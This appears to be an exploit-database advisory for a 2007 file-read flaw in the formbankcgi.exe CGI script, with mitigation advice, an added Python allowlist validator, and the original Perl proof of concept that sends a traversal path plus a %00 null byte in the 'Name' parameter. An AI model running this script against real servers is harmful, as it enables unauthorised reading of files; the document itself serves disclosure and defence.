by: Bl0od3r
CVSS: 5.5 (MEDIUM)
CWE: Remote File Inclusion
Patch Exists: NO
2007

CGI Remote File Inclusion Vulnerability

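This exploit allows an attacker to include remote files in a vulnerable CGI script, formbankcgi.exe. By manipulating the 'Name' parameter of the AbfrageForm request, an attacker can include arbitrary files from a remote server. The proof of concept below passes a file path in 'Name' followed by a URL-encoded null byte (%00). This can lead to remote code execution or information disclosure.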

Mitigation:

To mitigate this vulnerability, ensure that all user input is properly validated and sanitized before being used in include statements. Additionally, consider using a whitelist approach to limit the files that can be included.
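
One way to apply the validation and whitelist approach described above to a 'Name'-style parameter. This is an added example, not code from the vendor or from the original advisory. The form directory, the ".frm" suffix and the allowed form names are assumptions made for illustration.

```python
import re
from pathlib import Path
from urllib.parse import unquote

# Assumed layout: all form definitions live in one directory (hypothetical path).
FORM_DIR = Path("/srv/formbank/forms")
# Allowlist of form names the application serves (constructed sample values).
ALLOWED_FORMS = {"kontakt", "bestellung", "umfrage"}
# Only plain identifiers: no slashes, dots, percent signs or control bytes.
NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def resolve_form(raw_name: str) -> Path:
    """Map the raw 'Name' query value to a form file, or raise ValueError."""
    name = unquote(raw_name)  # decode exactly once, then validate the result
    if "\x00" in name:
        # Covers the %00 suffix used by the proof of concept.
        raise ValueError("NUL byte in Name")
    if not NAME_RE.fullmatch(name):
        # Covers "/../file.txt" and double-encoded input such as "%252e%252e".
        raise ValueError("Name contains characters outside the allowed set")
    if name not in ALLOWED_FORMS:
        raise ValueError("Name is not an allowlisted form")
    path = (FORM_DIR / f"{name}.frm").resolve()
    # Defence in depth: the resolved path must still sit inside FORM_DIR.
    if FORM_DIR.resolve() not in path.parents:
        raise ValueError("resolved path escapes the form directory")
    return path


def is_accepted(raw_name: str) -> bool:
    """Convenience wrapper: True only if the value passes every check."""
    try:
        resolve_form(raw_name)
        return True
    except ValueError:
        return False
```

Rejected values should be logged with the client address, since a 'Name' value carrying %00 or ".." is a strong indicator of probing.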

Exploit-DB raw data:

#!perl
#found by Bl0od3r
#visit http://dc3.dl.am  
#download:http://www.download-tipp.de/cgi-bin/jump.cgi?ID=8796
#developer:http://www.fersch.de/formbankserver/
use LWP::Simple;
sub usage
{
    die("file.pl host.com /../file.txt");
}
$host = $ARGV[0];
$file = $ARGV[1];
if (!$host) {
    die("No Host.");
}
if (!$file) {
    die("No File.");
}
getprint "http://".$host ."/cgi-bin/formbankcgi.exe/AbfrageForm?Name=".$ARGV[1]."%00";

# milw0rm.com [2007-01-01]